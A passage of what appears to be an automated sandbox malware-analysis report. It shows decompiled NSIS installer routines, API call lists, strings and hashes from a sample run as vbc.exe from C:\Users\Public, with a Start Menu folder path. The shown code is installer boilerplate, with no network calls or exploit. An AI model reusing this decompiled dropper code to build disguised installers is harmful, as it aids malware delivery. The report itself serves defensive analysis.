											E004042AF();
											goto L26;
										}
										E0040140B(_t129);
										 *0x421ef8 = _t129;
										goto L21;
									}
									__eflags =  *0x40a39c - _t135; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t134);
								goto L22;
							}
							SendMessageW(_t128, 0xf3, _t135, _t135);
							_t105 = IsWindowEnabled(_t128);
							__eflags = _t105;
							if(_t105 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t127, _t135, _t135);
						return 1;
					} else {
						DestroyWindow( *0x429218);
						 *0x429218 = _a12;
						L58:
						if( *0x425728 == _t135 &&  *0x429218 != _t135) {
							ShowWindow(_t127, 0xa);
							 *0x425728 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x00403e07
0x00403e10
0x00403f51
0x00403f55
0x00403f59
0x00403f5b
0x00403f60
0x00403f6b
0x00403f76
0x00403f7b
0x00403f7d
0x00403f7f
0x00403f82
0x00403f87
0x00403f95
0x00403fa2
0x00403fa9
0x00403fa9
0x00403faa
0x00403faa
0x00403faf
0x00403fb5
0x00403fbc
0x00403fc2
0x00403fc4
0x00404004
0x00404009
0x0040400e
0x0040400e
0x00404013
0x0040401c
0x0040401e
0x00404023
0x00404029
0x0040402d
0x0040402d
0x00404032
0x00404038
0x00000000
0x00000000
0x00404043
0x00404049
0x00000000
0x00000000
0x00404052
0x0040405a
0x0040405f
0x00404062
0x00404068
0x0040406d
0x00404070
0x00404076
0x0040407b
0x0040407e
0x00404084
0x0040408c
0x00404092
0x00404098
0x0040409c
0x004040a3
0x004040a3
0x004040a3
0x004040ad
0x004040bf
0x004040cb
0x004040d0
0x004040da
0x004040e0
0x004040e2
0x004040e7
0x004040e4
0x004040e4
0x004040e4
0x004040f7
0x0040410f
0x00404111
0x00404117
0x0040412c
0x00404119
0x00404122
0x00404124
0x00404124
0x00404132
0x00404142
0x00404158
0x0040415f
0x00404165
0x00404169
0x0040416e
0x00404170
0x00000000
0x00404176
0x00404176
0x00404178
0x00000000
0x00000000
0x0040417e
0x00404182
0x004041a7
0x004041ad
0x004041b3
0x004041b5
0x00000000
0x00000000
0x004041db
0x004041e1
0x004041e3
0x004041e8
0x00000000
0x00000000
0x004041ee
0x004041f1
0x004041f4
0x0040420b
0x00404217
0x00404230
0x00404236
0x0040423a
0x0040423f
0x00404245
0x00000000
0x00000000
0x0040424f
0x0040425a
0x00000000
0x0040425a
0x00404184
0x0040418a
0x00000000
0x00000000
0x00404190
0x00404196
0x00000000
0x00000000
0x00000000
0x0040419c
0x00404170
0x00404267
0x00404273
0x0040427a
0x00000000
0x00403fc6
0x00403fc6
0x00403fc9
0x00403ffc
0x00403ffc
0x00403ffe
0x00000000
0x00000000
0x00000000
0x00403ffe
0x00403fcb
0x00403fcf
0x00403fd4
0x00403fd6
0x00000000
0x00000000
0x00403fe6
0x00403fee
0x00000000
0x00403ff4
0x00403e22
0x00403e22
0x00403e26
0x00403e2b
0x00403e3a
0x00403e3a
0x00403e43
0x00403e4c
0x00403e57
0x00403e57
0x00403e63
0x00403e7f
0x00403e82
0x00403e95
0x00403e9b
0x00403f3e
0x00000000
0x00403f47
0x00403ea1
0x00403eae
0x00403eb0
0x00403eb2
0x00403ed1
0x00403ed1
0x00403ed4
0x00403ed9
0x00403edc
0x00403eec
0x00403eed
0x00403eef
0x00403f25
0x00403f38
0x00000000
0x00403f38
0x00403ef1
0x00403ef7
0x00403f10
0x00403f15
0x00403f17
0x00000000
0x00000000
0x00403f19
0x00403f05
0x00403f05
0x00403f07
0x00403f07
0x00000000
0x00403f07
0x00403efa
0x00403eff
0x00000000
0x00403eff
0x00403ede
0x00403ee4
0x00000000
0x00000000
0x00403ee6
0x00000000
0x00403ee6
0x00403ed6
0x00000000
0x00403ed6
0x00403ebc
0x00403ec3
0x00403ec9
0x00403ecb
0x00000000
0x00000000
0x00000000
0x00403ecb
0x00403e87
0x00000000
0x00403e65
0x00403e6b
0x00403e75
0x00404280
0x00404286
0x00404293
0x00404299
0x00404299
0x004042a3
0x00000000
0x004042a3
0x00403e63

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E3A
ShowWindow.USER32(?), ref: 00403E57
DestroyWindow.USER32 ref: 00403E6B
SetWindowLongW.USER32 ref: 00403E87
GetDlgItem.USER32(?,?), ref: 00403EA8
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403EBC
IsWindowEnabled.USER32(00000000), ref: 00403EC3
GetDlgItem.USER32(?,00000001), ref: 00403F71
GetDlgItem.USER32(?,00000002), ref: 00403F7B
SetClassLongW.USER32(?,000000F2,?), ref: 00403F95
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403FE6
GetDlgItem.USER32(?,00000003), ref: 0040408C
ShowWindow.USER32(00000000,?), ref: 004040AD
KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040BF
EnableWindow.USER32(?,?), ref: 004040DA
GetSystemMenu.USER32 ref: 004040F0
EnableMenuItem.USER32 ref: 004040F7
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040410F
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404122
lstrlenW.KERNEL32(00423728,?,00423728,00429240), ref: 0040414B
SetWindowTextW.USER32 ref: 0040415F
ShowWindow.USER32(?,0000000A), ref: 00404293

Strings

(7B, xrefs: 00404137

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: (7B
API String ID: 3282139019-3251261122
Opcode ID: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
Instruction ID: fc2721e09aaab4c72f4ebfdf2c157598dee1e076b88a1be66e463b94688f5fa6
Opcode Fuzzy Hash: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
Instruction Fuzzy Hash: 6BC1C2B1600201FFCB21AF61ED85E2B3AB9EB95345F40057EFA41B11F0CB7998529B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403A5B Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00403A5B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a250;
				_t22 = E004065EC(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423728;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E004060DF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423728, 0);
					__eflags =  *0x423728;
					if(__eflags == 0) {
						E004060DF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423728, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406159(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403D31(_t78, _t90);
				_t86 = L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93";
				 *0x42a2c0 =  *0x42a258 & 0x00000020;
				 *0x42a2dc = 0x10000;
				if(E00405CCE(_t90, L"C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93") != 0) {
					L16:
					if(E00405CCE(_t98, _t86) == 0) {
						E00406234(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x42a240, 0x67, 1, 0, 0, 0x8040);
					 *0x429228 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403D31(_t78, __eflags);
							__eflags =  *0x42a2e0;
							if( *0x42a2e0 != 0) {
								_t33 = E00405444(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42920c;
								if( *0x42920c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423708, 5); // executed
							_t39 = E0040657C("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040657C("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x4291e0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x4291e0);
								 *0x429204 = _t87;
								RegisterClassW(0x4291e0);
							}
							_t44 = DialogBoxParamW( *0x42a240,  *0x429220 + 0x00000069 & 0x0000ffff, 0, E00403DFE, 0); // executed
							E004039AB(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a240;
						 *0x4291e4 = E00401000;
						 *0x4291f0 =  *0x42a240;
						 *0x4291f4 = _t30;
						 *0x429204 = 0x40a3b4;
						if(RegisterClassW(0x4291e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423708 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a240, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					if( *(_t82 + 0x48) == 0) {
						goto L16;
					}
					_t76 = 0x4281e0;
					E004060DF( *((intOrPtr*)(_t82 + 0x44)),  *0x42a278 + _t78 * 2,  *0x42a278 +  *(_t82 + 0x4c) * 2, 0x4281e0, 0);
					_t63 =  *0x4281e0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x4281e2;
						 *((short*)(E00405BF3(0x4281e2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406212(_t86, E00405BC6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405C12(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403a61
0x00403a6a
0x00403a71
0x00403a73
0x00403a87
0x00403a99
0x00403aa2
0x00403aab
0x00403ab2
0x00403ab7
0x00403abe
0x00403ad1
0x00403ad1
0x00403adc
0x00403a75
0x00403a80
0x00403a80
0x00403ae1
0x00403aeb
0x00403af4
0x00403af9
0x00403b0a
0x00403b9c
0x00403ba4
0x00403bad
0x00403bad
0x00403bc3
0x00403bc9
0x00403bd7
0x00403c58
0x00403c60
0x00403c6a
0x00403c6f
0x00403c75
0x00403cff
0x00403d04
0x00403d06
0x00403d22
0x00000000
0x00403d22
0x00403d08
0x00403d0e
0x00403d16
0x00403d16
0x00000000
0x00403d0e
0x00403c83
0x00403c8e
0x00403c93
0x00403c95
0x00403c9c
0x00403c9c
0x00403ca7
0x00403caf
0x00403cb1
0x00403cb3
0x00403cbc
0x00403cbf
0x00403cc5
0x00403cc5
0x00403ce4
0x00403cf5
0x00000000
0x00403cfa
0x00403c62
0x00403c64
0x00000000
0x00403bd9
0x00403bd9
0x00403be5
0x00403bef
0x00403bf5
0x00403bfa
0x00403c09
0x00403d27
0x00403d27
0x00000000
0x00403d27
0x00403c18
0x00403c53
0x00000000
0x00403c53
0x00403b10
0x00403b10
0x00403b15
0x00000000
0x00000000
0x00403b23
0x00403b35
0x00403b3a
0x00403b43
0x00000000
0x00000000
0x00403b49
0x00403b4b
0x00403b58
0x00403b58
0x00403b61
0x00403b67
0x00403b8f
0x00403b97
0x00000000
0x00403b79
0x00403b7a
0x00403b83
0x00403b89
0x00403b8a
0x00000000
0x00403b8a
0x00403b85
0x00403b87
0x00000000
0x00000000
0x00000000
0x00403b87
0x00403b67

APIs

Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619

lstrcatW.KERNEL32 ref: 00403ADC
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,7556D4C4), ref: 00403B5C
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403B6F
GetFileAttributesW.KERNEL32(Call), ref: 00403B7A
LoadImageW.USER32 ref: 00403BC3

Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166

RegisterClassW.USER32 ref: 00403C00
SystemParametersInfoW.USER32 ref: 00403C18
CreateWindowExW.USER32 ref: 00403C4D
ShowWindow.USER32(00000005,00000000), ref: 00403C83
GetClassInfoW.USER32 ref: 00403CAF
GetClassInfoW.USER32 ref: 00403CBC
RegisterClassW.USER32 ref: 00403CC5
DialogBoxParamW.USER32 ref: 00403CE4

Strings

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93, xrefs: 00403AEB, 00403AF3, 00403B96, 00403B9C, 00403BAC
C:\Users\user\AppData\Local\Temp\, xrefs: 00403A60
RichEdit20W, xrefs: 00403CA7, 00403CAD
Control Panel\Desktop\ResourceLocale, xrefs: 00403A8F
1033, xrefs: 00403A7B, 00403AD7
(7B, xrefs: 00403A87
RichEd32, xrefs: 00403C97
Call, xrefs: 00403B23, 00403B2C, 00403B3A, 00403B89, 00403B8F
_Nb, xrefs: 00403BDF, 00403C47
RichEd20, xrefs: 00403C89
"C:\Users\Public\vbc.exe" , xrefs: 00403A5F
.DEFAULT\Control Panel\International, xrefs: 00403AC7
RichEdit, xrefs: 00403CB6
.exe, xrefs: 00403B69

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\Public\vbc.exe" $(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-2761441429
Opcode ID: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
Instruction ID: a49deb01357f173a4aad96dc60f9d02752f373419f451c4cfac2514e29acbaba
Opcode Fuzzy Hash: 0ee41304b45ea222ab407853068b800f5013aa7f596612d197709f65786b57e8
Instruction Fuzzy Hash: ED61C370240300BAD620AF669D45E2B3A7CEB84749F40457EF941B22E2DB7D9D52CA2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402ED5 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00402ED5(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v560;
				signed int _t54;
				void* _t57;
				void* _t62;
				intOrPtr _t65;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr _t71;
				signed int _t77;
				signed int _t82;
				signed int _t83;
				signed int _t89;
				intOrPtr _t92;
				signed int _t101;
				signed int _t103;
				void* _t105;
				signed int _t106;
				signed int _t109;
				void* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x42a24c = GetTickCount() + 0x3e8;
				GetModuleFileNameW(0, 0x438800, 0x400);
				_t105 = E00405DE7(0x438800, 0x80000000, 3);
				 *0x40a018 = _t105;
				if(_t105 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406212(L"C:\\Users\\Public", 0x438800);
				E00406212(0x439000, E00405C12(L"C:\\Users\\Public"));
				_t54 = GetFileSize(_t105, 0);
				__eflags = _t54;
				 *0x418ee0 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402E33(1);
					__eflags =  *0x42a254;
					if( *0x42a254 == 0) {
						goto L30;
					}
					__eflags = _v12;
					if(_v12 == 0) {
						L26:
						_t57 = GlobalAlloc(0x40, _v20); // executed
						_t110 = _t57;
						E0040670B(0x40ce48);
						E00405E16(0x40ce48,  &_v560, L"C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t62 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						__eflags = _t62 - 0xffffffff;
						 *0x40a01c = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E00403402( *0x42a254 + 0x1c);
							 *0x418ee4 = _t65;
							 *0x418ed8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
							_t68 = E0040317B(_v16, 0xffffffff, 0, _t110, _v20); // executed
							__eflags = _t68 - _v20;
							if(_t68 == _v20) {
								__eflags = _v40 & 0x00000001;
								 *0x42a250 = _t110;
								 *0x42a258 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x42a25c =  *0x42a25c + 1;
									__eflags =  *0x42a25c;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
									__eflags = _t101;
								} while (_t101 != 0);
								_t71 =  *0x418ed4; // 0x955a
								 *((intOrPtr*)(_t110 + 0x3c)) = _t71;
								E00405DA2(0x42a260, _t110 + 4, 0x40);
								__eflags = 0;
								return 0;
							}
							goto L30;
						}
						return L"Error writing temporary file. Make sure your temp folder is valid.";
					}
					E00403402( *0x418ed0);
					_t77 = E004033EC( &_a4, 4);
					__eflags = _t77;
					if(_t77 == 0) {
						goto L30;
					}
					__eflags = _v8 - _a4;
					if(_v8 != _a4) {
						goto L30;
					}
					goto L26;
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x42a254) & 0x00007e00) + 0x200;
						__eflags = _t109 - _t82;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						_t83 = E004033EC(0x418ee8, _t106);
						__eflags = _t83;
						if(_t83 == 0) {
							E00402E33(1);
							L30:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x42a254;
						if( *0x42a254 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E33(0);
							}
							goto L19;
						}
						E00405DA2( &_v40, 0x418ee8, 0x1c);
						_t89 = _v40;
						__eflags = _t89 & 0xfffffff0;
						if((_t89 & 0xfffffff0) != 0) {
							goto L19;
						}
						__eflags = _v36 - 0xdeadbeef;
						if(_v36 != 0xdeadbeef) {
							goto L19;
						}
						__eflags = _v24 - 0x74736e49;
						if(_v24 != 0x74736e49) {
							goto L19;
						}
						__eflags = _v28 - 0x74666f73;
						if(_v28 != 0x74666f73) {
							goto L19;
						}
						__eflags = _v32 - 0x6c6c754e;
						if(_v32 != 0x6c6c754e) {
							goto L19;
						}
						_a4 = _a4 | _t89;
						_t103 =  *0x418ed0; // 0x17a74
						 *0x42a2e0 =  *0x42a2e0 | _a4 & 0x00000002;
						_t92 = _v16;
						__eflags = _t92 - _t109;
						 *0x42a254 = _t103;
						if(_t92 > _t109) {
							goto L30;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L15:
							_v12 = _v12 + 1;
							_t109 = _t92 - 4;
							__eflags = _t106 - _t109;
							if(_t106 > _t109) {
								_t106 = _t109;
							}
							goto L19;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							goto L22;
						}
						goto L15;
						L19:
						__eflags = _t109 -  *0x418ee0; // 0x1a4bd
						if(__eflags < 0) {
							_v8 = E0040669D(_v8, 0x418ee8, _t106);
						}
						 *0x418ed0 =  *0x418ed0 + _t106;
						_t109 = _t109 - _t106;
						__eflags = _t109;
					} while (_t109 > 0);
					goto L22;
				}
			}

0x00402ee3
0x00402ee6
0x00402f00
0x00402f05
0x00402f18
0x00402f1d
0x00402f23
0x00000000
0x00402f25
0x00402f36
0x00402f47
0x00402f4e
0x00402f54
0x00402f56
0x00402f5b
0x00402f5d
0x0040304d
0x0040304f
0x00403054
0x0040305b
0x00000000
0x00000000
0x00403061
0x00403064
0x00403090
0x00403095
0x004030a0
0x004030a2
0x004030b3
0x004030ce
0x004030d4
0x004030d7
0x004030dc
0x004030fb
0x0040310b
0x0040311d
0x00403122
0x00403127
0x0040312a
0x00403133
0x00403137
0x0040313f
0x00403144
0x00403146
0x00403146
0x00403146
0x0040314e
0x0040314e
0x00403151
0x00403152
0x00403152
0x00403155
0x00403157
0x00403157
0x00403157
0x0040315a
0x00403161
0x0040316d
0x00403172
0x00000000
0x00403172
0x00000000
0x0040312a
0x00000000
0x004030de
0x0040306c
0x00403077
0x0040307c
0x0040307e
0x00000000
0x00000000
0x00403087
0x0040308a
0x00000000
0x00000000
0x00000000
0x00402f63
0x00402f63
0x00402f68
0x00402f6c
0x00402f73
0x00402f78
0x00402f7a
0x00402f7c
0x00402f7c
0x00402f84
0x00402f89
0x00402f8b
0x004030ea
0x0040312c
0x00000000
0x0040312c
0x00402f91
0x00402f97
0x00403017
0x0040301b
0x0040301e
0x00403023
0x00000000
0x0040301b
0x00402fa4
0x00402fa9
0x00402fac
0x00402fb1
0x00000000
0x00000000
0x00402fb3
0x00402fba
0x00000000
0x00000000
0x00402fbc
0x00402fc3
0x00000000
0x00000000
0x00402fc5
0x00402fcc
0x00000000
0x00000000
0x00402fce
0x00402fd5
0x00000000
0x00000000
0x00402fd7
0x00402fdd
0x00402fe6
0x00402fec
0x00402fef
0x00402ff1
0x00402ff7
0x00000000
0x00000000
0x00402ffd
0x00403001
0x00403009
0x00403009
0x0040300c
0x0040300f
0x00403011
0x00403013
0x00403013
0x00000000
0x00403011
0x00403003
0x00403007
0x00000000
0x00000000
0x00000000
0x00403024
0x00403024
0x0040302a
0x0040303a
0x0040303a
0x0040303d
0x00403043
0x00403045
0x00403045
0x00000000
0x00402f63

APIs

GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00402EE9
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F05

Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,00438800,80000000,00000003), ref: 00405DEB
Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\Public,C:\Users\Public,00438800,00438800,80000000,00000003), ref: 00402F4E
GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095

Strings

Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 0040312C
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004030DE
C:\Users\user\AppData\Local\Temp\, xrefs: 00402EDF, 004030AD
Inst, xrefs: 00402FBC
Null, xrefs: 00402FCE
Error launching installer, xrefs: 00402F25
"C:\Users\Public\vbc.exe" , xrefs: 00402ED5
C:\Users\Public, xrefs: 00402F30, 00402F35, 00402F3B
soft, xrefs: 00402FC5

Memory Dump Source

Source File: 00000005.00000002.1185274086.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1185243112.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185313446.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185477830.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185484437.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185490034.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185495870.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185506115.000000000046C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1185511904.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vbc.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\Public$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-3987189858
Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
Instruction ID: 3828440c67d76786f1e0e44594fc16ccb97003feb117245618602a5e37269db8
Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
Instruction Fuzzy Hash: 5E61C271A01204ABDB20DF65DD85B9E7BB8EB04355F20417BFA00F62D1CB7C9A458B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406234 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 207
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00406234(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				intOrPtr* _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t48;
				WCHAR* _t49;
				signed char _t51;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				short _t66;
				short _t67;
				short _t69;
				short _t71;
				void* _t81;
				signed int _t85;
				intOrPtr* _t89;
				signed char _t90;
				void* _t98;
				void* _t108;
				short _t109;
				signed int _t112;
				void* _t113;
				WCHAR* _t114;
				void* _t116;

				_t113 = __esi;
				_t108 = __edi;
				_t81 = __ebx;
				_t48 = _a8;
				if(_t48 < 0) {
					_t48 =  *( *0x42921c - 4 + _t48 * 4);
				}
				_push(_t81);
				_push(_t113);
				_push(_t108);
				_t89 =  *0x42a278 + _t48 * 2;
				_t49 = 0x4281e0;
				_t114 = 0x4281e0;
				if(_a4 >= 0x4281e0 && _a4 - 0x4281e0 >> 1 < 0x800) {
					_t114 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t109 =  *_t89;
					if(_t109 == 0) {
						break;
					}
					__eflags = (_t114 - _t49 & 0xfffffffe) - 0x800;
					if((_t114 - _t49 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t98 = 2;
					_t89 = _t89 + _t98;
